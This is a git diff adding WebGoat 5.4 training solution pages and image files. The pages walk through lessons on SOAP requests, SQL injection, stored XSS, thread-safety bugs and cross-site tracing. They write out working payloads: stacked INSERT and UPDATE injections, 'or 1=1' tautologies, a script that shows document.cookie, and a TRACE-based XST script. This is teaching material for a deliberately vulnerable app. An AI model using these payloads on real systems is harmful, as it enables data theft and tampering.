diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png
new file mode 100644
index 000000000..faf59c077
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png
new file mode 100644
index 000000000..4f4f0608a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png
new file mode 100644
index 000000000..04494b197
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg
new file mode 100644
index 000000000..b2529e37c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg
new file mode 100644
index 000000000..da2d8692a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg
new file mode 100644
index 000000000..efdefff06
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg
new file mode 100644
index 000000000..8375ab7cd
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest.html b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest.html
new file mode 100644
index 000000000..72b3257e3
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest.html
@@ -0,0 +1,879 @@
+
+
+
+Solution: Create a SOAP Request
+
+
+
Lesson
+Plan Title: How to
+Create a SOAP Request
+
+
+
+
Concept /
+Topic To Teach:
+
+
Web
+Services communicate through the use of SOAP requests. These requests are
+submitted to a web service in an attempt to execute a function defined in the
+web service definition language (WSDL). Let's learn something about WSDL files.
+Check out WebGoat's web service description language (WSDL) file.
+
+
+
+
General
+Goal(s):
+
+
Try
+connecting to the WSDL with a browser or Web Service tool. The URL for the web
+service is: http://localhostservices/SoapRequest The WSDL can usually
+be viewed by adding a ?WSDL on the end of the web service request.
+
+
+
+
+
+
Figure 1 - Lesson 21
+
+
+
+
Solution:
+
+
+
+
Click on the
+URL "WebGoat WSDL" to examine the Webservices Description Language file.
+
+
+
+
+
+
Figure 2 - WSDL
+
+
+
+
Count the
+number of operations like getFirstName. There are 4 operations defined.
+
+
+
+
+
+
Figure 3 Enter the ID
+
+
+
+
For the next
+question the getFirstNameRequest method uses an int as parameter type. Enter
+int and click "Submit".
+
+
+
+
+
+
Figure 4 Stage 2 Completed
+
+
+
+
Intercept the
+HTTP Request with WebScarab and click on the “Raw” tab. Make sure that
+“Intercept Responses” is selected.
+
+
+
+
+ Change the POST header to open
+ the SoapRequest: (This will vary based on which ports you are using) Change the Content-Type to
+ text/xml: Add a header SOAPAction.(No value needs to be specified for this header) Append the XML envelope to the
+ request:
+
+
<?xml
+version="1.0" encoding="UTF-8"?>
+
+
<SOAP-ENV:Envelope
+xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+
+
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+
+
+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+
+
+
<SOAP-ENV:Body>
+
+
<ns1:getFirstName
+SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
+xmlns:ns1="http://lessons">
+
+
<id
+xsi:type="xsd:int">101</id>
+
+
+ </ns1:getFirstName>
+
+
+
</SOAP-ENV:Body>
+
+
</SOAP-ENV:Envelope>
+
+
+
+
+
+
+
+
Figure 5 Updated HTTP request with SOAP parameters
+
+
+
+
The response
+is Joe.
+
+
+
+
Figure 6 Intercept response
+
+
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png
new file mode 100644
index 000000000..baa4ba50f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg
new file mode 100644
index 000000000..f9ab80c9b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png
new file mode 100644
index 000000000..ab5ed9af8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg
new file mode 100644
index 000000000..c12c37f71
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png
new file mode 100644
index 000000000..f46b3b8f7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg
new file mode 100644
index 000000000..d7c4069ba
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png
new file mode 100644
index 000000000..a841fc1d5
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg
new file mode 100644
index 000000000..2d4b523a5
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png
new file mode 100644
index 000000000..2b7656cc1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg
new file mode 100644
index 000000000..910fb47dc
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg
new file mode 100644
index 000000000..fc258a811
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlAddData.html b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlAddData.html
new file mode 100644
index 000000000..5e0ba4aba
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlAddData.html
@@ -0,0 +1,43 @@
+
+
+
+Solution: Modify Data with SQL
+Lesson Plan Title: Add Data with SQL
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: INSERT INTO table VALUES (value1, value2); INSERT INTO salaries VALUES ('rlupin',140000); userid whatever'; INSERT INTO salaries VALUES ('rlupin',150000); -- .whatever'; INSERT INTO salaries VALUES ('rlupin',140000);-- New employee record after using an INSERT query. Solution: Modify Data with SQL
+Lesson Plan Title: Modify Data with SQL
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: UPDATE table SET column=value WHERE column=value; salaries , setting the salary column to a new number.UPDATE salaries SET salary=999999 WHERE userid='jsmith' whatever'; UPDATE salaries SET salary=999999 WHERE userid='jsmith Updated salary after using a MODIFY query.
+
+
Lesson
+Plan Title: How to Perform Numeric SQL Injection
+
+
+
+
Concept /
+Topic To Teach:
+
+
+
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
+
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
+
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
+
+
General
+Goal(s):
+
+
+The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed.
+
+
+
+
+
+
Solution:
+
+
+
+
+
+
+
The
+application is taking the input from the select box and inserting it at the end of a pre-formed
+SQL command.
+
+
Compound SQL
+statements can be made by joining multiple tests with keywords like AND and OR.
+Try appending a SQL statement that always resolves to true.
+
+
+
+
This is the
+query: SELECT * FROM weather_data WHERE station = 101
+
+
+
+
Intercept the post request with WebScarab and replace 101 with 101 or 1=1!
+
+
+
+
+
+
+
Figure 1 Intercepted Request with WebScarab
+
+
+
+
As the SQL Statement is true for every station you get
+a list of all stations:
+
+
+
+
+
+
Figure 2 All stations are visible
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png
new file mode 100644
index 000000000..4876d330e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg
new file mode 100644
index 000000000..11fa10d47
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png
new file mode 100644
index 000000000..272aa8b2b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg
new file mode 100644
index 000000000..38109d42f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png
new file mode 100644
index 000000000..f2868eb02
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg
new file mode 100644
index 000000000..eb31b8e72
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png
new file mode 100644
index 000000000..bbafec0a6
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png
new file mode 100644
index 000000000..54ef52882
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection.html
new file mode 100644
index 000000000..725648e08
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection.html
@@ -0,0 +1,716 @@
+
+
+
+Solution: SQL String Injection
+
+
+
Lesson
+Plan Title: How to
+Perform String SQL Injection
+
+
+
+
Concept /
+Topic To Teach:
+
+
+
+
SQL injection
+attacks represent a serious threat to any database-driven site. The methods
+behind an attack are easy to learn and the damage caused can range from
+considerable to complete system compromise. Despite these risks, an incredible
+number of systems on the internet are susceptible to this form of attack.
+
+
+
+
General
+Goal(s):
+
+
The form
+below allows a user to view their credit card numbers. Try to inject an SQL
+string that results in all the credit card numbers being displayed. Try the
+user name of 'Smith'.
+
+
+
+
Solution:
+
+
+
+
Compared with
+the previous lesson, there is now a string parameter and not an integer.
+
+
Strings must be
+terminated with single quotes to have a valid SQL Query.
+
+
+
+
+
+
Figure 1 Lesson 18
+
+
+
+
The query
+used in this lesson is: SELECT * FROM user_data WHERE last_name = 'Your Name'
+
+
+
+
Enter for the
+last name value: Erwin' OR '1'='1
+
+
+
+
+
+
Figure 2 Lesson 18 Completed
+
+
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image001.png
new file mode 100644
index 000000000..030affe86
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image003.png
new file mode 100644
index 000000000..83342678d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image005.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image005.jpg
new file mode 100644
index 000000000..4154afc6a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image005.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image006.jpg
new file mode 100644
index 000000000..dbe7cb0ad
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png
new file mode 100644
index 000000000..1ad882b5f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png
new file mode 100644
index 000000000..d44ec5c39
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png
new file mode 100644
index 000000000..5a5d10342
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg
new file mode 100644
index 000000000..ca84b8469
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg
new file mode 100644
index 000000000..8ece60e0a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg
new file mode 100644
index 000000000..c0313ee42
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXss.html b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXss.html
new file mode 100644
index 000000000..a84fc2b40
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/StoredXss.html
@@ -0,0 +1,711 @@
+
+
+
+
+
+
Lesson Plan Title: How to Perform Stored Cross Site
+Scripting (XSS)
+
+
+
+
Concept / Topic To Teach:
+
+
It is always a
+good practice to scrub all inputs, especially those inputs that will later be
+used as parameters to OS commands, scripts, and database queries. It is
+particularly important for content that will be permanently stored somewhere.
+Users should not be able to create message content that could cause another
+user to load an undesirable page or undesirable content when the user's message
+is retrieved.
+
+
+
+
General Goal(s):
+
+
The user
+should be able to add message content that cause another user to load an
+undesirable page or content.
+
+
+
+
+
+
Figure 1 Lesson 14
+
+
+
+
Solution:
+
+
+
+
Enter this: <script language="javascript"
+type="text/javascript">alert("Ha Ha Ha");</script> in the message text
+box.
+
+
+
+
Figure 2 Stored message
+
+
+
+
+
+
Figure 3 Lesson 14 nearly completed
+
+
+
+
Now enter this: <script language="javascript"
+type="text/javascript">alert(document.cookie);</script> in the message text
+box. You will get your SessionId in a popup.
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem.html b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem.html
new file mode 100644
index 000000000..4ffede86b
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem.html
@@ -0,0 +1,670 @@
+
+
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Exploit Thread Safety Problems
+
+
+
+
Concept /
+Topic To Teach:
+
+
Web
+applications can handle many HTTP requests simultaneously. Developers often use
+variables that are not thread safe. Thread safety means that the fields
+of an object or class always maintain a valid state when used concurrently by
+multiple threads. It is often possible to exploit a concurrency bug by loading
+the same page as another user at the exact same time.
+
+
+
+
General
+Goal(s):
+
+
The user
+should be able to exploit the concurrency error in the web application and view
+login information for another user that is attempting the same function at the
+same time.
+
+
+
+
This will
+require the use of two browser windows .
+
+
+
+
+
+
Figure 1 Lesson 2
+
+
+
+
Solution:
+
+
+
+
Open a new
+browser window by pressing CTRL-N. Position the window so that you see both
+input fields. Enter user name "dave" in the left window and user name "jeff" in
+the right window.
+
+
Click very
+fast on the submit button in the right window and then in the left window.
+
+
+
+
+
+
Figure 2 2 Browser Windows
+
+
+
+
The result
+should be that you receive the same data in both windows, even when using a
+different user name!
+
+
+
+
Figure 3 Lesson 2 Completed
+
+
+
+
The root-cause
+of this exploit is that the Java code uses a static variable for the user name.
+When submitting twice, the same thread and hence the same static variable
+containing the username of the first request will be used.
+
+
This is
+obvious when examining the Java code:
+
+
+
+
private
+static String currentUser;
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png
new file mode 100644
index 000000000..398af0841
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg
new file mode 100644
index 000000000..52526d118
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png
new file mode 100644
index 000000000..d22701fe3
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg
new file mode 100644
index 000000000..4b222b8f0
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png
new file mode 100644
index 000000000..8c9ea75b7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg
new file mode 100644
index 000000000..6a1c67f50
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS.html b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS.html
new file mode 100644
index 000000000..502acdd17
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS.html
@@ -0,0 +1,685 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Perform Cross Site Tracing (XST) Attacks
+
+
+
+
Concept /
+Topic To Teach:
+
+
It
+is always a good practice to scrub all input, especially those inputs that will
+later be used as parameters to OS commands, scripts, and database queries. It
+is particularly important for content that will be permanently stored somewhere
+in the application. Users should not be able to create message content that
+could cause another user to load an undesireable page or undesireable content
+when the user's message is retrieved.
+
+
+
+
General
+Goal(s):
+
+
Tomcat is
+configured to support the HTTP TRACE command. Your goal is to perform a Cross
+Site Tracing (XST) attack.
+
+
+
+
Solution:
+
+
+
+
You need to
+introduce a cross site trace attack. This can be realized by embedding the
+following script in the three digit access code.
+
+
+
+
<script
+type="text/javascript">if ( navigator.appName.indexOf("Microsoft")
+!=-1) {var xmlHttp = new
+ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE",
+"./", false); xmlHttp.send();str1=xmlHttp.responseText; while
+(str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>");
+document.write(str1);}</script>
+
+
+
+
+
+
Figure 1 Lesson 15
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png
new file mode 100644
index 000000000..1a73bd667
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg
